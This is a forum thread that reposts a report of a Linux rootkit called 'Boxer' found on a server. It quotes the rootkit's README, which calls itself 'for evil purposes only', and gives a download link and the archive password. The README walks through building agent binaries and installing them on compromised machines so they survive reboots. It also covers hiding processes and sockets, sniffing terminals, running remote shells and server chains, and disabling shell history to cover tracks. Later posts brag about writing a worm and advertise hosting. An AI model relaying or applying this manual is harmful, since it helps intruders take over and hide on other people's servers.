0day linux 2.6 rootkit in the wild

[taslayer]

http://www.securityfocus.com/archive/75/473510

Quote:

I found one interesting tool on my server, with the
name 'Boxer 0.99 BETA3'. It's protected by ELFuck
linux executables obfuscator. Google doesn't know
anything about it.
Now, it is available at http://surfall.net/rel.tar.gz
(ELFuck password: 'notdead')

In the tar.gz

Quote:

BOXER
This technical information is being provided for evil purposes only

==
VERSION
0.99 BETA3


==
FEATURES
* Hidden process creation (hidden sockets (tcp/udp/unix/raw), hidden procfs info). Suckit style hidden files.
* Remote control interface.
- Authentication using RSA2048 keys.
- TCP-channel encryption with AES256 and RC4.
- Multiple (parallel) virtual connections inside one ?쐏hysical??TCP-connection. Each virtual connection can serve one of the following tasks:
a. remote command execution
b. shell sessions
c. file upload/download
d. Connections with other BOXER-servers and tunneling them to the client (creation connection chains: client->server1->server2).
* Tty sniffing
* Reboot-safe
* Ability to run 3rd party binaries (attached to main agent binary) when server reboots.
* Run on x86 32bit machines (kernel: 2.4.*, 2.6.* including 2.6.21).


==
USING BOXER
Main boxer binary can be used in two modes: interactive and non-interactive. To enter interactive mode you can simply run main boxer binary "./boxer".
First of all you need agent binary (binary to install to owned boxes) with attached public key:
* Create RSA keypair
* Create agent binary

a. key creation
* Create private key:
"./boxer keygen key_pvt"
OR (interactive)
"rksh />keygen key_pvt"
* Extract public key part:
"./boxer keypub key_pvt key_pub"
OR
"rksh />keypub key_pvt key_pub"
* Create keypack with the set of our public keys:
"./boxer keypack key_pack key_pub1 key_pub2 key_pub3"
OR
"rksh />keypack key_pack key_pub1 key_pub2 key_pub3"

b. agent-binary creation
* Create agent-binary
"./boxer conf"
OR
"rksh />conf"
* Attach keypack file to agent-binary. (OPTIONAL) Attach binary file (RECOMENDED: statically linked binary) to agent-binary. That binary will start with agent-binary.
"./boxer gen ./agent ./key_pack ./exec_bin exec_arg1 exec_arg2"
OR
"rksh />gen ./agent ./key_pack ./exec_bin exec_arg1 exec_arg2"


==
LOADING AND INSTALLING

"Load" - load agent binary into RAM without any filesystem changes. Agent will be online until first reboot. "Install" - make agent to "go online" after reboots. There are two ways to "load" and "install" binary:

* Loading with automatic install. In this case agent will be loaded into RAM and installed into system to autoload after reboots:
"./agent x"
(YOU CAN RUN ./agent x ONLY ON FRESH MACHINES - WITHOUT LOADED BOXER)

* Loading with manual install. Agent will be loaded into RAM:
"./agent s"
If you want to install binary, we should connect to box and type following command in interactive mode:
"rksh box>install"
With manual install you can test boxer on your boxes. If it works stable, you can later "install" it.


==
USING CLIENT

* Connecting to boxer-hosts.

1. You can connect to any open port. Client has the ability to scan remote host for open ports. To use this feature you need to set up port list to scan:

"rksh />set con ports 21 22 25 53 80 110 111"

2. Also you can define RSA key, that will be used by default in authentication process:

"rksh />set con key ./key_pvt"

3. And limit of connection attempts:

"rksh />set con tries 2

4. After setting parameters connect to servers:

"rksh />open www.backdoored.box:80"
"rksh www.backdoored.box>open second.backdoored.box"

* Using shell

1. Define shell binary to execute on the remote side:

"rksh />set sh bin /bin/bash"

2. Create local profile file to use with shell:

"
cat <<EOF > profile.boxer
> ulimit -S -c 0 > /dev/null 2>&1
>
> PATH=/bin:/sbin:/usr/bin:/usr/sbin
> HISTFILE=/dev/null
> USER="`id -un`"
> LOGNAME=$USER
> HOSTNAME=`/bin/hostname`
> TERM=xterm
>
> export PATH HISTFILE USER LOGNAME HOSTNAME TERM
> id
> w
> EOF
"

3. Load profile:

"rksh />set sh rc ./profile.boxer"

4. Enter shell:
"rksh www.backdoored.box>sh new"
5. Switch back to "rksh":
Ctrl+7


* Startup file

cat <<EOF > startup
set con ports 21 22 25 53 80 110 111
set con key ./key_pvt
set con tries 2
set sh bin /bin/bash
set sh rc ./profile.boxer
EOF

"rksh />run ./startup"


OTHER FEATURES
in interactive mode type:
"rksh />help"

[linux tech]

Securities should be the utmost importance. Continue Taslayer

[taslayer]

what part of im a C|EH dont you all get

[linux tech]

Yeah, we are aware of it.

I am the best Linux tech...

[taslayer]

well linux tech tell me the processes that are running on your box ;)

[James]

yes linux tech you should tell us the process which was asked by taslayer;)

[taslayer]

just a lil info on me for ppl who dont no
i was arrested at the age of 10 and banned from all electronics for 3 years, also i am one of the creators of the win32.randex

[Danny Lawson]

Quote:

Originally Posted by taslayer

just a lil info on me for ppl who dont no
i was arrested at the age of 10 and banned from all electronics for 3 years, also i am one of the creators of the win32.randex

Nice lil introduction about your achivements;) and that too at an early age.

[zany]

It's amazing at so small age you had done a very big job.:eek:

[Sean]

LOL

Great work!!!

[taslayer]

yups thank u :P

[Christina]

Thanks Tas and post some more topics on security

[Rodricks]

Nice post! keep on posting

[Sean]

Check out the features of server management techniques provided by bodhost -

http://www.bodhost.com/dedicated_ser...nagement.shtml

[aliya]

Yes I had seen that it's interesting

[Sean]

So al what did you learn from it....hehe

[jazz]

bodhost's support is excellent and they are providing service with the latest technology.In short I want to say Bodhost is best